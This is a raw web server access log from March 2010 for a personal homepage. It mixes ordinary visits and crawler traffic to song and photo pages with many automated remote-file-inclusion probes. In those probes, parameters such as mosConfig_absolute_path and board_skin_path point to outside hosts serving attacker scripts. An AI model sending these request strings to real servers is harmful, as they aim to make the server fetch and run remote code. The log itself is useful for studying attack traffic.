219.240.39.222 - - [02/Mar/2010:05:15:09 -0800] "GET /~daveh//skin/zero_vote/error.php?dir=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 312 /home/users/d/daveh/public_html/skin "-" "Mozilla/5.0" 0 www.accesscom.com
219.240.39.222 - - [02/Mar/2010:05:15:09 -0800] "GET /~daveh/logs/access.log//skin/zero_vote/error.php?dir=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 328 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
219.240.39.222 - - [02/Mar/2010:05:15:10 -0800] "GET /~daveh/logs//skin/zero_vote/error.php?dir=http://trouvaillecosmeticos.com.br/components/com_migrator/vsh/index1.txt??? HTTP/1.1" 404 317 /home/users/d/daveh/public_html/logs//skin "-" "Mozilla/5.0" 0 www.accesscom.com
65.55.109.123 - - [02/Mar/2010:05:34:52 -0800] "GET /~daveh/martin/pages/DSC00028.htm HTTP/1.1" 200 1097 /home/users/d/daveh/public_html/martin/pages/DSC00028.htm "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)" 0 www.accesscom.com
69.174.246.133 - - [02/Mar/2010:05:35:01 -0800] "GET /~daveh/logs/access.log%20%20/board.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
69.174.246.133 - - [02/Mar/2010:05:35:01 -0800] "GET /~daveh/logs/board.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/board.php "-" "Mozilla/5.0" 0 www.accesscom.com
69.174.246.133 - - [02/Mar/2010:05:35:01 -0800] "GET /~daveh/board.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/board.php "-" "Mozilla/5.0" 0 www.accesscom.com
219.150.205.156 - - [02/Mar/2010:05:35:16 -0800] "GET /~daveh/logs//index2.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//index2.php "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" 0 www.accesscom.com
219.150.205.155 - - [02/Mar/2010:05:35:16 -0800] "GET /~daveh/logs/access.log//index2.php?mosConfig_absolute_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" 0 www.accesscom.com
69.174.246.133 - - [02/Mar/2010:05:35:56 -0800] "GET /~daveh/logs/access.log%20%20/board.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
69.174.246.133 - - [02/Mar/2010:05:35:56 -0800] "GET /~daveh/board.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 296 /home/users/d/daveh/public_html/board.php "-" "Mozilla/5.0" 0 www.accesscom.com
69.174.246.133 - - [02/Mar/2010:05:35:56 -0800] "GET /~daveh/logs/board.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 301 /home/users/d/daveh/public_html/logs/board.php "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:41:33 -0800] "GET /~daveh///delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:44:50 -0800] "GET /~daveh/logs///delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 308 /home/users/d/daveh/public_html/logs///delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:44:50 -0800] "GET /~daveh///delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/delete_all.php "-" "Mozilla/5.0" 0 www.accesscom.com
222.239.227.209 - - [02/Mar/2010:05:44:50 -0800] "GET /~daveh/logs/access.log///delete_all.php?board_skin_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 319 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
207.46.199.37 - - [02/Mar/2010:05:49:13 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong5.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
65.55.107.184 - - [02/Mar/2010:06:07:58 -0800] "GET /~daveh/logs/Sep03.html HTTP/1.1" 200 13234 /home/users/d/daveh/public_html/logs/Sep03.html "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707)" 0 www.accesscom.com
88.191.94.188 - - [02/Mar/2010:06:13:24 -0800] "GET /~daveh//bbs/write_comment_update.php?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 316 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [02/Mar/2010:06:13:24 -0800] "GET /~daveh/logs//bbs/write_comment_update.php?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
88.191.94.188 - - [02/Mar/2010:06:13:24 -0800] "GET /~daveh/logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 332 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:06:20:40 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:06:20:40 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:06:20:40 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:06:22:44 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:06:22:45 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
194.39.140.100 - - [02/Mar/2010:06:22:45 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:06:26:56 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:06:26:56 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
62.140.23.24 - - [02/Mar/2010:06:26:56 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:06:36:53 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:06:36:53 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:06:36:57 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:06:38:56 -0800] "GET /~daveh///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 306 /home/users/d/daveh/public_html/kboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:06:38:57 -0800] "GET /~daveh/logs///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 311 /home/users/d/daveh/public_html/logs///kboard "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:06:39:01 -0800] "GET /~daveh/logs/access.log%20%20///kboard/kboard.php?board=notice&act=vote&no=7&page=&search_mode=&search_word=&cid=&PHPSESSID=72f096fee8ebb69eacc4f50b95c936e9/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
207.46.204.241 - - [02/Mar/2010:06:40:13 -0800] "GET /~daveh/case/?D=A HTTP/1.1" 200 1925 /home/users/d/daveh/public_html/case/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
220.80.108.81 - - [02/Mar/2010:06:41:09 -0800] "GET /~daveh//bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 305 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [02/Mar/2010:06:41:09 -0800] "GET /~daveh/logs//bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 310 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
220.80.108.81 - - [02/Mar/2010:06:41:09 -0800] "GET /~daveh/logs/access.log//bbs//////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 321 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
65.55.109.231 - - [02/Mar/2010:06:50:30 -0800] "GET /~daveh/photos/?S=D HTTP/1.1" 200 1292 /home/users/d/daveh/public_html/photos/ "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)" 0 www.accesscom.com
67.195.37.176 - - [02/Mar/2010:06:50:34 -0800] "GET /~daveh/web/?D=D HTTP/1.0" 200 554 /home/users/d/daveh/public_html/web/ "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
65.55.214.50 - - [02/Mar/2010:07:36:27 -0800] "GET /~daveh/laser/Image6.jpg HTTP/1.1" 200 271950 /home/users/d/daveh/public_html/laser/Image6.jpg "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 1 www.accesscom.com
65.55.214.50 - - [02/Mar/2010:07:36:27 -0800] "GET /~daveh/laser/?S=D HTTP/1.1" 200 2866 /home/users/d/daveh/public_html/laser/ "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:07:38:52 -0800] "GET /~daveh///?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2795 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:07:38:53 -0800] "GET /~daveh/logs/access.log%20%20///?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 307 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:07:38:55 -0800] "GET /~daveh/logs///?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 13288 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:07:39:08 -0800] "GET /~daveh///?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 2795 /home/users/d/daveh/public_html/ "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:07:39:10 -0800] "GET /~daveh/logs///?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 200 13288 /home/users/d/daveh/public_html/logs/ "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [02/Mar/2010:07:39:13 -0800] "GET /~daveh/logs/access.log%20%20///?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 307 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
66.235.124.55 - - [02/Mar/2010:07:40:14 -0800] "GET /%7Edaveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.accesscom.com
203.105.95.94 - - [02/Mar/2010:07:47:10 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" 0 www.accesscom.com
203.105.95.94 - - [02/Mar/2010:07:47:10 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" 0 www.accesscom.com
203.105.95.94 - - [02/Mar/2010:07:47:11 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" 1 www.accesscom.com
148.188.144.50 - - [02/Mar/2010:07:52:50 -0800] "GET /%7Edaveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.dogpile.com/dogpile/ws/results/Web/skits%20on%20pirates/1/417/TopNavigation/Relevance/iq=true/zoom=off/_iceUrlFlag=7?_IceUrl=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MS-RTC LM 8; .NET CLR 2.0.50727)" 1 www.accesscom.com
148.188.144.50 - - [02/Mar/2010:07:52:50 -0800] "GET /%7Edaveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/%7Edaveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MS-RTC LM 8; .NET CLR 2.0.50727)" 0 www.accesscom.com
148.188.144.50 - - [02/Mar/2010:07:52:50 -0800] "GET /%7Edaveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/%7Edaveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MS-RTC LM 8; .NET CLR 2.0.50727)" 0 www.accesscom.com
67.195.37.176 - - [02/Mar/2010:07:55:01 -0800] "GET /~daveh/sean/monty/sheep.txt HTTP/1.0" 200 1871 /home/users/d/daveh/public_html/sean/monty/sheep.txt "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
65.23.57.162 - - [02/Mar/2010:08:02:04 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4HPNN_enUS347US347&q=boy+scout+camp+songs" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.
65.23.57.162 - - [02/Mar/2010:08:02:04 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTB5.6)" 0 www.accesscom.com
65.23.57.162 - - [02/Mar/2010:08:02:09 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTB5.6)" 1 www.accesscom.com
78.251.234.255 - - [02/Mar/2010:08:10:34 -0800] "GET /~daveh/sunset-glare.jpg HTTP/1.1" 200 206184 /home/users/d/daveh/public_html/sunset-glare.jpg "http://profiles.friendster.com/user.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" 42 www.accesscom.com
134.36.64.137 - - [02/Mar/2010:08:13:53 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://dragon.sleepdeprived.ca/songbook/links.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.3) Gecko/20090824 (CK-UoD-CLS) Firefox/3.5.3 (.NET CLR 3.5.30729)" 0 www.accesscom.com
134.36.64.137 - - [02/Mar/2010:08:13:54 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.3) Gecko/20090824 (CK-UoD-CLS) Firefox/3.5.3 (.NET CLR 3.5.30729)" 0 www.accesscom.com
134.36.64.137 - - [02/Mar/2010:08:14:36 -0800] "GET /~daveh/sean/song/pbsong3.html HTTP/1.1" 200 65639 /home/users/d/daveh/public_html/sean/song/pbsong3.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.3) Gecko/20090824 (CK-UoD-CLS) Firefox/3.5.3 (.NET CLR 3.5.30729)" 1 www.accesscom.com
134.36.64.137 - - [02/Mar/2010:08:14:42 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.accesscom.com/~daveh/sean/song/pbsong3.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.3) Gecko/20090824 (CK-UoD-CLS) Firefox/3.5.3 (.NET CLR 3.5.30729)" 0 www.accesscom.com
134.36.64.137 - - [02/Mar/2010:08:15:00 -0800] "GET /~daveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.3) Gecko/20090824 (CK-UoD-CLS) Firefox/3.5.3 (.NET CLR 3.5.30729)" 1 www.accesscom.com
199.212.19.130 - - [02/Mar/2010:08:18:06 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://dragon.sleepdeprived.ca/songbook/links.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.accesscom.com
199.212.19.130 - - [02/Mar/2010:08:18:07 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.accesscom.com
199.212.19.130 - - [02/Mar/2010:08:19:03 -0800] "GET /~daveh/sean/song/pbsong1.html HTTP/1.1" 200 41905 /home/users/d/daveh/public_html/sean/song/pbsong1.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.accesscom.com
77.241.83.107 - - [02/Mar/2010:08:24:52 -0800] "GET /~daveh//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 359 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
77.241.83.107 - - [02/Mar/2010:08:24:52 -0800] "GET /~daveh/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 364 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
77.241.83.107 - - [02/Mar/2010:08:24:52 -0800] "GET /~daveh/logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 377 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
77.241.83.107 - - [02/Mar/2010:08:24:55 -0800] "GET /~daveh/logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 377 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
77.241.83.107 - - [02/Mar/2010:08:24:55 -0800] "GET /~daveh/logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 364 /home/users/d/daveh/public_html/logs//administrator "-" "Mozilla/5.0" 0 www.accesscom.com
